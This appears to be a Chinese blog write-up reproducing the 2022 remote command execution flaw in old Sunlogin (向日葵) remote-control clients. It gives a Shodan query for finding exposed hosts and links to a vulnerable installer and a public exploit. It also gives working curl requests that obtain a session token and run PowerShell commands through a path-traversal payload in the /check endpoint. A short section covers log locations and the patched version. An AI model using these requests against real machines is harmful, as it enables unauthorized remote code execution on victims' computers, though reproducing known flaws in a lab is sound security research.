向日葵远程控制软件RCE远程命令执行漏洞复现

漏洞简述

向日葵远程控制软件是一款远程控制软件。2022年2月互联网披露向日葵远程控制软件旧版本中存在远程命令执行漏洞，向日葵远程控制软件会监听高端口（默认40000以上），攻击者可构造恶意请求获取Session，从而通过身份认证后利用向日葵远程控制软件相关API接口执行任意命令。低版本向日葵RCE主要发生在对外开放的接口/check处，当cmd的值为ping/nslookup开头时触发。

漏洞影响版本

• 向日葵个人版for Windows <= 11.0.0.33826
• 向日葵简约版<= V1.0.1.43315（2021.12）

Shodan 搜索语法

http.html:"Verification failure" port:>40000

由于shodan很少扫描收录高端口号。所以该结果并不准确。

漏洞环境搭建

这里使用10.5的版本进行复现。

https://zgao.top/download/SunloginClient_10.5.0.29613_X64.exe

漏洞exp

https://github.com/Mr-xn/sunlogin_rce

漏洞复现

端口指纹

[root@VM-4-7-centos sunlogin_rce]# curl win.zgao.top:50951
{"success":false,"msg":"Verification failure"}

获取cookie

http://ip:port/cgi-bin/rpc?action=verify-haras

[root@VM-4-7-centos sunlogin_rce]# curl win.zgao.top:50951/cgi-bin/rpc?action=verify-haras
{"__code":0,"enabled":"1","verify_string":"wj4WkCRIrb4gT8LoyYNTtvvl3rx7fAQO","code":0} 

命令执行

http://ip:port/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

curl http://win.zgao.top:50951/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami -H 'Cookie:CID=wj4WkCRIrb4gT8LoyYNTtvvl3rx7fAQO' -v

溯源排查

日志默认位置：C:\Program Files\Oray\SunLogin\SunloginClient\log

修复方式

更新至12.5.0.44227最新版本。https://sunlogin.oray.com/download

赞赏

微信赞赏支付宝赞赏